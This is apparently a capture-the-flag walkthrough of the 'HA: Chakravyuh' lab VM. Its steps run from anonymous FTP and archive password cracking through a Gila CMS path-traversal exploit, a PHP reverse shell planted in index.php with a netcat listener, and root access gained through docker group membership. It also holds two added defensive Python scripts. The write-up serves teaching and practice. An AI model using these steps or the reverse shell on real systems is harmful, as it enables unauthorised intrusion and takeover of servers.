HA_CHAKRAVYUH

root@kali:~/Downloads# nmap -p- -A 192.168.22.131
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 09:47 GMT
Nmap scan report for 192.168.22.131
Host is up (0.00066s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c6:54:93:e8:1c:aa:f7:5f:d0:7d:6e:2e:df:ec:88:69 (RSA)
| 256 d4:b4:2e:96:4e:f7:f6:b7:83:a8:ef:06:6c:80:1d:25 (ECDSA)
|_ 256 66:d0:5b:93:56:c5:7a:2e:60:90:c4:4e:4f:18:5a:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Chakravyuh
65530/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Oct 27 10:46 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.22.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:F8:5E:E7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.66 ms 192.168.22.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds

Now in the browser:

http://192.168.22.131

In another terminal, log in to the anonymous FTP service on port 65530:

root@kali:~/Downloads# ftp 192.168.22.131 65530
Connected to 192.168.22.131.
220 (vsFTPd 3.0.3)
Name (192.168.22.131:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Oct 27 10:46 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 247 Oct 27 10:34 arjun.7z
226 Directory send OK.
ftp> get arjun.7z
local: arjun.7z remote: arjun.7z
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for arjun.7z (247 bytes).
226 Transfer complete.
247 bytes received in 0.00 secs (106.8724 kB/s)
ftp> bye
221 Goodbye.

Download 7z2john.py to turn the archive's password into a crackable hash:

https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py

root@kali:~/Downloads# python 7z2john.py arjun.7z > hash
root@kali:~/Downloads# john --wordlist=/usr/share/wordlists/rockyou.txt hash

root@kali:~/Downloads# john hash --show
arjun.7z:family

Extract the archive with the recovered password (family); it contains secret.txt.

The file holds a single base64 string:

Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=

Decode it:

root@kali:~/Downloads# echo "Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=" | base64 -d
gila:admin@gmail.com:princesa

Now in the browser; the decoded string gives the CMS path and the admin credentials:

http://192.168.22.131/gila/

http://192.168.22.131/gila/admin

username : admin@gmail.com
password : princesa

Click Login. With admin access, look for a known vulnerability in this CMS:

root@kali:~/Downloads# searchsploit gila cms
-------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------- ----------------------------------------
Gila CMS 1.9.1 - Cross-Site Scripting | exploits/php/webapps/46557.txt
Gila CMS < 1.11.1 - Local File Inclusion | exploits/multiple/webapps/47407.txt
-------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

root@kali:~/Downloads# searchsploit -m 47407
Exploit: Gila CMS < 1.11.1 - Local File Inclusion
URL: https://www.exploit-db.com/exploits/47407
Path: /usr/share/exploitdb/exploits/multiple/webapps/47407.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /root/Downloads/47407.txt

root@kali:~/Downloads# cat 47407.txt
# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
# Google Dork: N/A
# Date: 04-08-2019
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://github.com/GilaCMS/gila
# Software Link: https://github.com/GilaCMS/gila
# Version: 1.10.9
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
# CVE : CVE-2019-16679

*********** *Steps to reproduce the Vulnerability* *************

Login into the application as an admin user or equivalent user and go to the below link

http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts

################################################################

Now try the same traversal against the target in the browser:

http://192.168.22.131/gila/admin/fm/?f=src../../../../../../../../../etc/passwd

Open index.php in the file manager and replace its contents with this reverse shell code (shown from the $descriptorspec array onward):

    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

save it
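The file-manager bug used above boils down to path handling: a value like src../../../../etc/passwd begins with the expected src prefix, yet the .. segments walk straight out of the web root. The script below is an added example (not code from this walkthrough and not Gila CMS's own code) that puts a hypothetical prefix-only check, reconstructed from the shape of the payload, beside a hardened containment check built on realpath and commonpath. The base directory name and the "legit" request path are constructed for the demonstration; the traversal string is the one from the page.

```python
"""Path containment for a file-manager ``f`` parameter (added example).

Not code from the walkthrough or from Gila CMS. ``naive_is_allowed`` is a
hypothetical reconstruction of the kind of check the payload
``src../../../../etc/passwd`` slips past: a string-prefix test that never
canonicalises the path, so ``..`` segments walk out of the web root.
``resolve_within`` is the hardened form.
"""
import os
import tempfile
from typing import Optional

# Traversal payload from the walkthrough, relative to the CMS file root.
TRAVERSAL = "src../../../../../../../../../etc/passwd"


def naive_is_allowed(requested: str) -> bool:
    """Hypothetical prefix-only check: 'src../..' starts with 'src', so it passes."""
    return requested.startswith("src")


def resolve_within(base: str, requested: str) -> Optional[str]:
    """Return the canonical path of ``requested`` only if it stays under ``base``.

    realpath() collapses '..' components and follows symlinks on both sides,
    and commonpath() then proves containment. An absolute ``requested`` is
    rejected too: os.path.join discards ``base`` for it, so the result no
    longer sits under the base directory. A sibling such as ``base2`` is
    also rejected, which a plain startswith(base) test would let through.
    """
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, requested))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


def demo(base: Optional[str] = None) -> dict:
    """Run both checks over constructed inputs; the directory need not exist."""
    if base is None:
        # Constructed base directory for the demo, not a real CMS install.
        base = os.path.join(tempfile.gettempdir(), "gila-example-root")
    return {
        "naive_allows_traversal": naive_is_allowed(TRAVERSAL),
        "strict_allows_traversal": resolve_within(base, TRAVERSAL) is not None,
        "strict_allows_legit": resolve_within(base, "src/index.php") is not None,
        "strict_allows_absolute": resolve_within(base, "/etc/passwd") is not None,
        "strict_allows_base_sibling": resolve_within(base, "../gila-example-root2/x") is not None,
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {allowed}")
```

The same containment check has to guard every operation the file manager offers, not only reads: the walkthrough goes on to edit index.php through this interface, so a write or rename path that skips the check is just as exposed.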

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

When index.php is loaded in the browser, the listener receives the shell:

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.22.131.
Ncat: Connection from 192.168.22.131:56630.
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
02:50:07 up 58 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),116(docker)
/bin/sh: 0: can’t access tty; job control turned off
$

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),116(docker)
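The id output shows www-data in group 116 (docker), which is what makes the rest of the escalation possible: any member of that group can start a container with the host's filesystem bind-mounted and read or write it as root. The audit script below is an added example, not part of the walkthrough, that parses /etc/group and /etc/passwd content and reports every member of a root-equivalent group, singling out service accounts (system uid or no login shell), since a web server account in the docker group is the worst case. The list of groups treated as root-equivalent is an assumption of this example, and the sample group and passwd lines are constructed to mirror the id output above rather than copied from the target.

```python
"""Audit /etc/group for members of root-equivalent groups (added example).

Not part of the original walkthrough. Membership of the ``docker`` group lets
a user start a container with the host filesystem bind-mounted, so every
member of that group is effectively root on the host; ``lxd`` and ``disk``
are commonly treated the same way, and ``sudo``/``wheel`` are listed for
completeness. The group list is an assumption of this example.
"""
import sys
from typing import Dict, List, NamedTuple, Tuple

ROOT_EQUIVALENT_GROUPS = ("docker", "lxd", "disk", "sudo", "wheel")


class Finding(NamedTuple):
    group: str
    user: str
    uid: int
    shell: str
    service_account: bool  # system uid and/or no interactive shell


def parse_passwd(text: str) -> Dict[str, Tuple[int, str]]:
    """Map username -> (uid, shell) from /etc/passwd content."""
    users: Dict[str, Tuple[int, str]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 7:
            continue
        users[parts[0]] = (int(parts[2]), parts[6])
    return users


def parse_group(text: str) -> Dict[str, List[str]]:
    """Map group name -> supplementary members from /etc/group content."""
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        groups[parts[0]] = [m for m in parts[3].split(",") if m]
    return groups


def audit(group_text: str, passwd_text: str,
          watch: Tuple[str, ...] = ROOT_EQUIVALENT_GROUPS) -> List[Finding]:
    """Return one Finding per (watched group, member) pair."""
    users = parse_passwd(passwd_text)
    findings: List[Finding] = []
    for group, members in parse_group(group_text).items():
        if group not in watch:
            continue
        for user in members:
            uid, shell = users.get(user, (-1, "?"))
            service = (0 <= uid < 1000) or shell.endswith(("nologin", "false"))
            findings.append(Finding(group, user, uid, shell, service))
    return findings


# Constructed sample data modelled on the id output in the walkthrough
# (www-data, uid 33, in group 116 "docker"); not copied from the target.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:bob
www-data:x:33:
docker:x:116:www-data
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
bob:x:1000:1000:bob:/home/bob:/bin/bash
"""


def main(argv: List[str]) -> None:
    """Usage: audit.py [/etc/group /etc/passwd]; defaults to the sample data."""
    if len(argv) == 3:
        with open(argv[1]) as g, open(argv[2]) as p:
            group_text, passwd_text = g.read(), p.read()
    else:
        group_text, passwd_text = SAMPLE_GROUP, SAMPLE_PASSWD
    for f in audit(group_text, passwd_text):
        tag = "SERVICE ACCOUNT" if f.service_account else "user"
        print(f"{f.group}: {f.user} (uid={f.uid}, shell={f.shell}) [{tag}]")


if __name__ == "__main__":
    main(sys.argv)
```

On the sample data the script reports www-data in docker as a service account and bob in sudo as an ordinary user. The fix for the first finding is to remove the web server account from the docker group and, where containers must be started from a web process, to go through a restricted socket proxy or rootless Docker instead of direct group membership.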

www-data@ubuntu:/$ docker run -v /root:/mnt -it alpine
docker run -v /root:/mnt -it alpine
/ # cd /mnt
cd /mnt
/mnt # ls
ls
final.txt
/mnt # cat final.txt
cat final.txt

,╓,
╢▀╢
╟Ü╡
▓Ü╢
,╓, ,,╓▄▓▓╣▄╓,, ,╓,
║▓╙╣ ╓g▓▓╣╣╣╣╣╣▓╣╣╣╣╣╣▓▓æw ╣╩║▓
“▓╣ß╗,,g▓╣╣╣╣▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╣╣╣╣▓W,,╥▓▓╢”
▓▌▓▐╣╣╣▓▓▓╩▀’ ▓Ü▒ ╙╩▓▓▓╣╣╣▌▓]Ñ
╒▓╣╣▓▓▓▀ /▓W║m ╙▓▓▓╣╣▓╗
φ╣╣╣▓▓╩▓║@╖, ╘▓µ╣╛ ,╓@▓║╜▓▓▓╣╣▓
▓╣╣▓▓▓ ▓U▓╓@ ▓Ü▒ Æ▓▓H╢` ╚▓▓╣╣▓
▓╣╣▓▓▀ ╙▓▓╣╣, ╠Ü║ ,▓▓╢Ñ╜ ╙▓▓╣╣▓
╒╣╣╣▓▓ ╙▓╬▓▓▓║╢╢▓▓▓▓║” ╟▓╣╣╣▌
▓╣╣▓▓ Æ▓║╣▒▄▓▓▄╢╢▓▓ ▓▓╣╣▓
╔▓║╣]¢║╢╟▓▓╣▌╣]║╢╜φ╙╢║║¢U╣▒▒█▓▓▌██▌║Ü╣H¢╬▓▓▓φ▓▓▓¢╢▐╣▓▓▓▓▓@[╣║▓W
“╙╙ ‘╙▀╝▓╣╣▓╣’╙╙▀Ü▓▀╙└” ▓▓▒╫███▓█▌╢╫╣’`””╙╩∩╝╙”`▓▓╣╣▓╙╜”` ╙╙”
╟╣╣╣▓L ]▓▓║Ñ▒▒╣@╢▓▓L ,▓▓╣╣▓
╣╣╣▓▓ ╓@╣▓”▀▓▓▓▓▓▀”║╣▓╦, ▓▓╣╣╣”
╙╣╣╣▓▓ ╔╟║╠▓╜ ╟Ü▓ ╙╣╢▓▓φ ▓▓╣╣╣▌
╙╣╣╣▓▓╖ g╢▓▓@” ╢Ü╣ V╢║▓▓ ╓▓▓╣╣╣▀
“▓╣╣▓▓▓@▀ ╙╠▓▓$ ╙▒▓▓▓╣╣▓┘
║▓▓╣▓▓▓&╖ ╣Ü╣` ,φ▓▓▓╣▓▓▓r
,╣╠▓Ç▓╣╣╣▓▓▓▓&æ╖,,║Ü▓,,╓g&▓▓▓▓╣╣╣▓Ü╢║▓ç
,@N╠╝” ╙▓▓╣╣╣╣▓▓▓▓▓▓▓▓▓▓▓╣╣╣╣╣▓▀ `╨╣╝@,
▓▓║╜ “▀▀▓▓╣╣▓▓▓╣╣▓▓▀▀╙ ╙╣▓▓

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Kavish Tyagi : https://twitter.com/Tyagi_kavish_

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

@SAKSHAM DIXIT